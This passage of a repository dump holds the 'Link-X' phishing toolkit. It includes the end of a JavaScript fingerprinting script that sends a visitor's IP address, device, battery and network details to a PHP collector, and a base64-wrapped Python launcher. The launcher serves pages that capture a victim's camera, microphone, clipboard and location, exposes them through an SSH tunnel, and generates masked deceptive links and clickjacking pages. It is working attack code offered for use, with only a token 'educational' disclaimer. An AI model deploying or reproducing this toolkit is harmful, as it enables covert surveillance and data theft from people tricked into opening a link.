143 | level: (battery.level * 100) + "%", 144 | charging: battery.charging 145 | }); 146 | }).catch(() => { 147 | resolve({ level: "Error", charging: "Error" }); 148 | }); 149 | }); 150 | } 151 | 152 | // Kumpulkan & kirim semua data korban 153 | async function fetchData() { 154 | try { 155 | const ip = send("./ip.php?echo=true").trim() || "0.0.0.0"; 156 | const time = new Date().toString(); 157 | const cookie = navigator.cookieEnabled; 158 | const touch = navigator.maxTouchPoints || "N/A"; 159 | const ua = navigator.userAgent || "N/A"; 160 | const platf = navigator.platform || "N/A"; 161 | const lang = navigator.language || "N/A"; 162 | const memory = navigator.deviceMemory || "N/A"; 163 | const wid = screen.width; 164 | const hig = screen.height; 165 | const netType = navigator.connection?.type || "unknown"; 166 | const saveData = navigator.connection?.saveData || "N/A"; 167 | const dname = getDeviceName(); 168 | const battery = await safeGetBattery(); 169 | 170 | const query = `?ip=${encodeURIComponent(ip)}&time=${encodeURIComponent(time)}&touch=${encodeURIComponent(touch)}&cookie=${cookie}&ua=${encodeURIComponent(ua)}&platf=${encodeURIComponent(platf)}&lang=${encodeURIComponent(lang)}&memory=${encodeURIComponent(memory)}&wid=${wid}&hig=${hig}&netType=${encodeURIComponent(netType)}&saveData=${saveData}&batLevel=${encodeURIComponent(battery.level)}&batCharge=${battery.charging}&dname=${encodeURIComponent(dname)}`; 171 | 172 | send("./get_data.php" + query); 173 | window.location.href = REDIRECT_URL; 174 | 175 | } catch (e) { 176 | console.error("Error in details.js:", e); 177 | window.location.href = REDIRECT_URL; 178 | } 179 | } 180 | 181 | // Jalankan pengumpulan 182 | fetchData(); -------------------------------------------------------------------------------- /Link-x.py: -------------------------------------------------------------------------------- 1 | # Obfuscated by Mr.X 2 | import base64 3 | exec(base64.b64decode('"""
About Tool:
    Name : Link-X
    Description : Camera, Voice, Clipboard (etc...) Grabber
    Author : Mr.X
    GitHub : https://github.com/Whomrx666  
    Version : 2.0

More Description:
    This Tool can Hack and Grab data of Camera, Voice, Clipboard, Location.
    It can Grab As much info as Possible from Victims Device.
    All this requires Just a Malicious Link

Tunnel Options:
    localhost.run (via SSH)

Note:
    This Tool is only for Educational Purpose
    Mr.X will not be responsible for any Misuse
"""

import os
import time
import sys
import json
import shutil
import subprocess as sb
import re

# Global Variables
attackMethod = ""
maskUrl = ""
host = "127.0.0.1"
chroot = False if (sb.getoutput("command -v termux-chroot") == "") else True
tunnel_active = True

columns = shutil.get_terminal_size().columns

# Cyberpunk Neon Colors
NEON_PURPLE = "\033[38;5;93m"
NEON_BLUE = "\033[38;5;81m"
NEON_WHITE = "\033[38;5;15m"
RESET = "\033[0m"

def cPrint(text, Return=False):
    text = text.replace("cPurple", NEON_PURPLE).replace("cBlue", NEON_BLUE).replace("cWhite", NEON_WHITE)
    output = text + RESET
    if Return:
        return output
    print(output)

def psb(z, end="\n"):
    z = cPrint(z, True)
    for p in z + end:
        sys.stdout.write(p)
        sys.stdout.flush()
        time.sleep(0.01)

def logo():
    os.system("clear")
    banner = f"""
{NEON_PURPLE} ██╗     ██╗███╗   ██╗██╗  ██╗    ██╗  ██╗
{NEON_PURPLE} ██║     ██║████╗  ██║╚██╗██╔╝    ╚██╗██╔╝
{NEON_BLUE} ██║     ██║██╔██╗ ██║ ╚███╔╝      ╚███╔╝ 
{NEON_BLUE} ██║     ██║██║╚██╗██║ ██╔██╗      ██╔██╗ 
{NEON_PURPLE} ███████╗██║██║ ╚████║██╔╝ ██╗    ██╔╝ ██╗
{NEON_PURPLE} ╚══════╝╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝    ╚═╝  ╚═╝
{RESET}"""
    for line in banner.strip().splitlines():
        print(line.center(columns))

    sep_len = min(columns - 10, 50)
    separator = NEON_PURPLE + "─" * sep_len + RESET
    print(separator.center(columns))

    info_lines = [
        f"{NEON_BLUE}             Author {NEON_WHITE}: {NEON_WHITE}Mr.X",
        f"{NEON_BLUE}             Tool {NEON_WHITE}: {NEON_WHITE}Link-X (Hack With Link)",
        f"{NEON_BLUE}           GitHub {NEON_WHITE}: {NEON_WHITE}https://github.com/Whomrx666  ",
        f"{NEON_BLUE}                    Coder {NEON_WHITE}: {NEON_WHITE}Whomrx {NEON_PURPLE}v2.0"
    ]
    for line in info_lines:
        print(line.center(columns))

    print(separator.center(columns))

def killAll():
    pids = sb.getoutput("pidof php ssh").split()
    for pid in pids:
        if pid.isdigit():
            os.system(f"kill {pid} > /dev/null 2>&1")
    os.system("pkill -f localhost.run > /dev/null 2>&1")
    os.system("pkill -f php > /dev/null 2>&1")

def update():
    psb("\n    cWhite[cPurple!cWhite] Please wait, Checking Update...")
    try:
        oldVersion = json.loads(open(".version", "r").read())["version"]
    except:
        oldVersion = "1.0"
    
    try:
        newVersion = json.loads(sb.getoutput("curl -s \"https://raw.githubusercontent.com/Whomrx666/Link-x/main/.version  \"").replace("\n", "").strip())["version"]
    except:
        cPrint("\n    cWhite[cPurple!cWhite] Something Went Wrong!")
        sys.exit("")
    
    if oldVersion != newVersion:
        psb("\n    cWhite[cPurple!cWhite] Tool Update Found!")
        cPrint("    [!] Updating Tool...")
        os.system("cd ../ && rm -rf Link-x && git clone https://github.com/Whomrx666/Link-x   > /dev/null 2>&1")
        psb("\n    [cPurple*cWhite] Update Complete!")
        psb("    [cPurple*cWhite] Starting new Version...")
        os.system("cd ../Link-x && python Link-x.py")
    else:
        psb("\n    cWhite[cPurple*cWhite] Tool is already Up to Date!")
        time.sleep(0.8)
        input(cPrint("\n    [cPurple*cWhite] Press Enter to Continue...", True))

def printLocation(tmp):
    data = json.loads(tmp)["info"]
    time.sleep(0.4)
    cPrint(f"\n    [cPurple~cWhite] LatitudecPurple: cWhite{data['lat']}")
    cPrint(f"\n    [cPurple~cWhite] LongitudecPurple: cWhite{data['lon']}")
    cPrint(f"\n    [cPurple~cWhite] AccuracycPurple: cWhite{data['acc']}")
    cPrint(f"\n    [cPurple~cWhite] AltitudecPurple: cWhite{data['alt']}")
    lat = data['lat']
    lon = data['lon']
    cPrint(f"\n    [cPurple~cWhite] Google MapcPurple: cWhitehttps://www.google.com/maps/search/?api=1&query=  {lat},{lon}")
    cPrint("\n    [cPurple*cWhite] Waiting for next Victim...")

def printDetails(tmp):
    data = json.loads(tmp)["info"]
    cPrint("\n    [cPurple*cWhite] Parsing Data...")
    ip = data.get("ip", "unknown").replace("\n", "").replace(" ", "")
    
    ipDetails = sb.getoutput(f"curl -s 'http://ip-api.com/json/{ip}'")
    
    country = "None"
    city = "None"
    callCode = "None"
    timeZone = "None"
    ISP = "None"
    
    if not ("error" in ipDetails) and ipDetails.strip() != "":
        try:
            ipDetails = json.loads(ipDetails)
            if isinstance(ipDetails, dict) and ipDetails.get("status") == "success":
                country = ipDetails.get("country", "None")
                city = ipDetails.get("city", "None")
                callCode = ipDetails.get("countryCode", "None")
                timeZone = ipDetails.get("timezone", "None")
                ISP = ipDetails.get("isp", "None")
        except:
            pass
    
    cPrint(f"\n    [cPurple*cWhite] IP Address: {data.get('ip', 'unknown')}")
    print("")
    cPrint("[cPurple*cWhite] Basic Info".center(columns))
    print("")
    cPrint(f"    [cPurple~cWhite] Time in Victim’s DevicecPurple: cWhite{data.get('time', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Device NamecPurple: cWhite{data.get('dname', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] CookiecPurple: cWhite{data.get('cookie', 'N/A').title()}")
    cPrint(f"    [cPurple~cWhite] User AgentcPurple: cWhite{data.get('ua', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] PlatformcPurple: cWhite{data.get('platf', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] LanguagecPurple: cWhite{data.get('lang', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Device MemorycPurple: cWhite{data.get('memory', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Click XcPurple: cWhite{data.get('clickX', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Click YcPurple: cWhite{data.get('clickY', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Click TimecPurple: cWhite{data.get('clickTime', 'N/A')}")
    print("")
    cPrint("[cPurple*cWhite] Screen Info".center(columns))
    print("")
    cPrint(f"    [cPurple~cWhite] Max Touch PointscPurple: cWhite{data.get('touch', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Screen WidthcPurple: cWhite{data.get('wid', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Screen HeightcPurple: cWhite{data.get('hig', 'N/A')}")
    print("")
    cPrint("[cPurple*cWhite] Network Info".center(columns))
    print("")
    cPrint(f"    [cPurple~cWhite] Data TypecPurple: cWhite{data.get('netType', 'N/A').title()}")
    cPrint(f"    [cPurple~cWhite] ISPcPurple: cWhite{str(ISP)}")
    print("")
    cPrint("[cPurple*cWhite] Battery Info".center(columns))
    print("")
    cPrint(f"    [cPurple~cWhite] Battery LevelcPurple: cWhite{data.get('batLevel', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] ChargingcPurple: cWhite{data.get('batCharge', 'N/A')}")
    print("")
    cPrint("[cPurple*cWhite] Country Info".center(columns))
    print("")
    cPrint(f"    [cPurple~cWhite] CountrycPurple: cWhite{str(country)}")
    cPrint(f"    [cPurple~cWhite] CitycPurple: cWhite{str(city)}")
    cPrint(f"    [cPurple~cWhite] Calling CodecPurple: cWhite{str(callCode)}")
    cPrint(f"    [cPurple~cWhite] Time ZonecPurple: cWhite{str(timeZone)}")
    cPrint("\n    [cPurple*cWhite] Waiting for next Victim...")

def setupFiles(redirectUrl, toCopy=None, show=None):
    if not os.path.exists(".server"):
        os.system("mkdir .server > /dev/null 2>&1")
    os.system("rm -rf ./.server/* > /dev/null 2>&1")

    if attackMethod != "clickjacking":
        if not redirectUrl or redirectUrl.strip() == "":
            redirectUrl = "https://you.regettingold.com/  "
        else:
            redirectUrl = redirectUrl.strip()
            if not redirectUrl.startswith(("http://", "https://")):
                redirectUrl = "https://" + redirectUrl
            redirectUrl = redirectUrl.rstrip('/') + '/'

        os.system("cp -r ./.site/index/* ./.server/")
        os.system("cp -r ./.site/js/" + attackMethod + ".js ./.server/index.js")
        os.system("cp -r ./.site/php/" + attackMethod + ".php ./.server/get_data.php")

        try:
            with open("./.server/index.js", "r", encoding="utf-8") as f:
                jsData = f.read()
            jsData = re.sub(
                r"https?://you\.regettingold\.com/?",
                redirectUrl,
                jsData,
                flags=re.IGNORECASE
            )
            with open("./.server/index.js", "w", encoding="utf-8") as f:
                f.write(jsData)
        except Exception as e:
            cPrint(f"\n    [cPurple!cWhite] Warning: Failed to update redirect URL in index.js: {str(e)}")

        if attackMethod == "voice":
            try:
                with open("./.server/index.js", "r", encoding="utf-8") as f:
                    jsData = f.read()
                jsData = re.sub(
                    r'redirectUrl\s*=\s*["\'][^"\']*["\']',
                    f'redirectUrl = "{redirectUrl}"',
                    jsData
                )
                with open("./.server/index.js", "w", encoding="utf-8") as f:
                    f.write(jsData)
            except Exception as e:
                cPrint(f"\n    [cPurple!cWhite] Warning: Failed to update redirect URL in voice.js: {str(e)}")

    else:
        os.system("cp -r ./.site/clickjacking/* ./.server/")
        os.system("rm -f ./.server/index.php")

# ✅ UPDATED: createMaskPage — now works for camera too
def createMaskPage(maskName, mainUrl):
    maskDir = "./.server/mask"
    os.makedirs(maskDir, exist_ok=True)
    maskFile = os.path.join(maskDir, f"{maskName}.html")

    # Escape quotes for JS
    safeUrl = mainUrl.replace('"', '\\"')
    
    htmlContent = f"""<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Loading...</title>
    <meta http-equiv="refresh" content="0;url={mainUrl}">
    <script>
        window.location.replace("{safeUrl}");
    </script>
</head>
<body>
</body>
</html>"""

    try:
        with open(maskFile, "w", encoding="utf-8") as f:
            f.write(htmlContent)
        base = mainUrl.rstrip('/')
        return f"{base}/mask/{maskName}.html"
    except Exception as e:
        cPrint(f"\n    [cPurple!cWhite] Failed to create mask page: {str(e)}")
        return None

def startPHP():
    port = "8080"
    os.system(f"cd ./.server && php -S {host}:{port} > /dev/null 2>&1 &")
    return port

def startLocalhostRun(port, maskUrl=None):
    global tunnel_active
    cPrint("\n    [cPurple*cWhite] Launching localhost.run tunnel...")
    os.system("rm -f .lhr.log > /dev/null 2>&1")
    
    ssh_cmd = (
        f"ssh -o StrictHostKeyChecking=no "
        f"-o ServerAliveInterval=30 "
        f"-o ServerAliveCountMax=3 "
        f"-R 80:localhost:{port} "
        f"nokey@localhost.run > .lhr.log 2>&1 &"
    )
    
    if chroot:
        os.system(f"termux-chroot {ssh_cmd}")
    else:
        os.system(ssh_cmd)
    
    time.sleep(4)
    mainUrl = ""
    for _ in range(40):
        if os.path.exists(".lhr.log"):
            try:
                with open(".lhr.log", "r") as f:
                    content = f.read()
                    if "https://" in content:
                        for line in content.splitlines():
                            if "https://" in line and ".lhr.life" in line:
                                mainUrl = line.split()[0]
                                break
                        if mainUrl:
                            break
            except:
                pass
        time.sleep(1)
    
    if not mainUrl:
        cPrint("\n    [cPurple!cWhite] Failed to start localhost.run tunnel!")
        cPrint("    [cPurple!cWhite] Check internet or try again.\n")
        tunnel_active = False
        return "", "", ""
    
    mainUrl = mainUrl.strip()
    if not mainUrl.startswith("https://"):
        mainUrl = "https://" + mainUrl

    return mainUrl, "", ""

def getIp():
    path = ".server/ip.txt"
    if os.path.exists(path):
        with open(path, "r") as f:
            ip_data = [line.strip() for line in f if line.strip()]
        if ip_data:
            cPrint("\n    cBlue[cPurple+cBlue] cWhiteVictim Opened The Link!!")
            cPrint(f"\n    [cPurple~cWhite] Victim IPcPurple: cWhite{ip_data[0]}")
            cPrint("\n    [cPurple~cWhite] Saved IncPurple: cWhiteip.txt")
            os.system("cat " + path + " >> ip.txt")
            os.system("rm " + path)

def getLog():
    attDesDict = {
        "camera": {"ext": ".png", "head": "cam_", "file": "Image File"},
        "voice": {"ext": ".wav", "head": "audio_", "file": "Voice File"},
        "clipboard": {"ext": ".dat", "head": "cb_", "file": "Clipboard Data"},
        "location": {"ext": ".json", "head": "loc_", "file": "Location Data"},
        "details": {"ext": ".json", "head": "details_", "file": "Device Details"},
        "clickjacking": {"ext": ".json", "head": "click_", "file": "Click Data"}
    }
    if attackMethod not in attDesDict:
        return

    attack = attDesDict[attackMethod]
    ext = attack["ext"]
    head = attack["head"]
    fileType = attack["file"]
    body = str(time.time())[:10]

    logPath = "./.server/Log.log"
    if not os.path.exists(logPath):
        return
    if not (open(logPath, "r").read().strip() == "Received"):
        return

    os.remove(logPath)
    cPrint(f"\n    cPurple[cWhite+cPurple] cWhite{fileType} Received!")

    if attackMethod == "clipboard":
        clipData = open(".server/data.dat", "r").read()
        cPrint(f"\n[cPurpleDatacWhite]cPurple: cWhite{clipData}")
    elif attackMethod == "location":
        locData = open(".server/data.json", "r").read()
        printLocation(locData)
    elif attackMethod in ["details", "clickjacking"]:
        wait_count = 0
        while not os.path.exists(".server/data.json") and wait_count < 10:
            time.sleep(0.3)
            wait_count += 1
        if os.path.exists(".server/data.json"):
            with open(".server/data.json", "r") as f:
                deviceData = f.read()
            printDetails(deviceData)

    os.system(f"mv ./.server/*{ext} /sdcard/HackedData/{head}{body}{ext} 2>/dev/null")

def startProcess():
    global maskUrl, tunnel_active
    maskUrl = ""
    redirectUrl = ""

    cPrint("\n" + ("─" * 40).center(columns))
    
    mask_choice = input(cPrint("\n    cWhite[cPurple*cWhite] Want to generate a Masked URL for social engineering? [cPurpley/ncWhite]:> ", True)).strip().lower()
    if mask_choice == "y":
        while True:
            mask_input = input(cPrint("\n    [cPurple*cWhite] Enter Mask Name (e.g. free-iphone):> cWhite", True)).strip()
            if mask_input:
                maskUrl = mask_input
                break
            else:
                cPrint("    [cPurple!cWhite] Mask name cannot be empty.")

    if attackMethod == "clickjacking":
        cPrint("\n    cWhite[cPurple*cWhite] ClickJacking Mode Activated")
        cPrint("    cWhite[cPurple*cWhite] Redirect After Click: https://www.apple.com/  ")
        redirectUrl = "https://www.apple.com/  "
    else:
        cPrint("\n    cWhite[cPurple*cWhite] Enter a Website URL to Redirect Victim After Exploit")
        cPrint("    cWhite(cPurpleLeave empty for default: YouAreGettingOldcWhite)")
        redirectUrl = input(cPrint("    cPurple[URL]cWhite:> ", True)).strip()

    cPrint("\n" + ("─" * 40).center(columns))
    cPrint("    [cPurple!cWhite] Setting up Files...".center(columns))
    setupFiles(redirectUrl)

    time.sleep(1)
    cPrint("\n    [cPurple!cWhite] Starting PHP Server...")
    port = startPHP()
    time.sleep(2)

    mainUrl, _, _ = startLocalhostRun(port, None)

    if not mainUrl:
        cPrint("\n    [cPurple!cWhite] Cannot proceed without tunnel. Exiting.")
        sys.exit(1)

    # ✅ UPDATED: Now camera uses mask page like voice
    maskedDisplayUrl = None
    if maskUrl:
        if attackMethod in ["camera", "voice", "clickjacking"]:
            maskedDisplayUrl = createMaskPage(maskUrl, mainUrl)
        else:
            cleanMask = maskUrl.replace(" ", "").replace("/", "").strip()
            if cleanMask:
                maskedDisplayUrl = f"https://{cleanMask}@{mainUrl.replace('https://', '')}"

    logo()
    cPrint(f"\ncWhite[cPurple*cWhite] Successfully Hosted atcPurple: cWhitehttp://{host}:{port}")
    
    cPrint(f"\n[cPurple~cWhite] URL 01 (Main URL)cPurple: cWhite{mainUrl}")

    if maskedDisplayUrl:
        if attackMethod in ["voice", "clickjacking"]:
            cPrint(f"\n[cPurple~cWhite] URL 02 (Mask Page)cPurple: cWhite{maskedDisplayUrl}")
            cPrint("\n    [cPurple!cWhite] 💡 This mask page redirects instantly to the real payload.")
            cPrint("    [cPurple!cWhite] ✅ Safe for Voice & ClickJacking!")
        else:
            # Now includes camera
            cPrint(f"\n[cPurple~cWhite] URL 02 (Mask Page)cPurple: cWhite{maskedDisplayUrl}")
            cPrint("\n    [cPurple!cWhite] ⚡ Masked URL ready. Works for Camera, Voice, and more.")

    cPrint("\n[cPurple*cWhite] Data Saved In cPurple: cWhite/sdcard/HackedData")
    cPrint("\n[cPurple*cWhite] Waiting for Victim, Press cPurpleCtrl cWhite+ cPurpleC cWhiteto Stop...\n")

    try:
        while True:
            tunnel_check = sb.getoutput("ps aux | grep 'localhost.run' | grep -v grep | grep -v python")
            if not tunnel_check.strip() and tunnel_active:
                cPrint("\n    [cPurple!cWhite] Tunnel down! Restarting...")
                mainUrl, _, _ = startLocalhostRun(port, None)
                if mainUrl:
                    if maskUrl and attackMethod in ["camera", "voice", "clickjacking"]:
                        maskedDisplayUrl = createMaskPage(maskUrl, mainUrl)
                    logo()
                    cPrint(f"\n[cPurple~cWhite] New URL:cPurple {mainUrl}")
                    if maskedDisplayUrl:
                        cPrint(f"[cPurple~cWhite] Mask URL:cPurple {maskedDisplayUrl}")
                else:
                    cPrint("\n    [cPurple!cWhite] Failed to restart tunnel.")
                    break

            getIp()
            getLog()
            time.sleep(2)
    except KeyboardInterrupt:
        tunnel_active = False
        cPrint("\n    [cPurple!cWhite] Process Stopped By User\n")
        killAll()
        sys.exit()

def menu():
    logo()
    psb("\n    cWhite[cPurple*cWhite] Choose Your Option: \n")
    cPrint("    [cPurple01cWhite] Camera Hack")
    cPrint("    [cPurple02cWhite] Voice Hack")
    cPrint("    [cPurple03cWhite] Clipboard Hack")
    cPrint("    [cPurple04cWhite] Location Hack")
    cPrint("    [cPurple05cWhite] ClickJacking")
    cPrint("    [cPurple06cWhite] Get Victim Device Details")
    cPrint("    [cPurple08cWhite] Update Tool")
    cPrint("    [cPurple00cWhite] Exit")

    op = input(cPrint("\n    [cPurple*cWhite] Enter Your Choice:> cPurple", True)).strip()
    if op in ["0", "00"]:
        cPrint("\n    [cPurple!cWhite] Exiting Link-X...\n")
        killAll()
        sys.exit(0)
    while op not in ["1", "2", "3", "4", "5", "6", "8"]:
        psb("\n    cWhite[cPurple!cWhite] Wrong Choice!")
        op = input(cPrint("\n    [cPurple*cWhite] Enter Your Choice:> cPurple", True)).strip()
        if op in ["0", "00"]:
            cPrint("\n    [cPurple!cWhite] Exiting Link-X...\n")
            killAll()
            sys.exit(0)

    if op == "8":
        update()

    attList = ["camera", "voice", "clipboard", "location", "clickjacking", "details"]
    global attackMethod
    attackMethod = attList[int(op) - 1]
    startProcess()

if __name__ == "__main__":
    required = ["php", "curl", "wget", "unzip", "ssh"]
    if any(sb.getoutput(f"command -v {pkg}") == "" for pkg in required):
        os.system("python setup.py")

    if not os.path.exists("/sdcard/HackedData"):
        os.makedirs("/sdcard/HackedData", exist_ok=True)
    killAll()
    menu()').decode('utf-8')) 4 | --------------------------------------------------------------------------------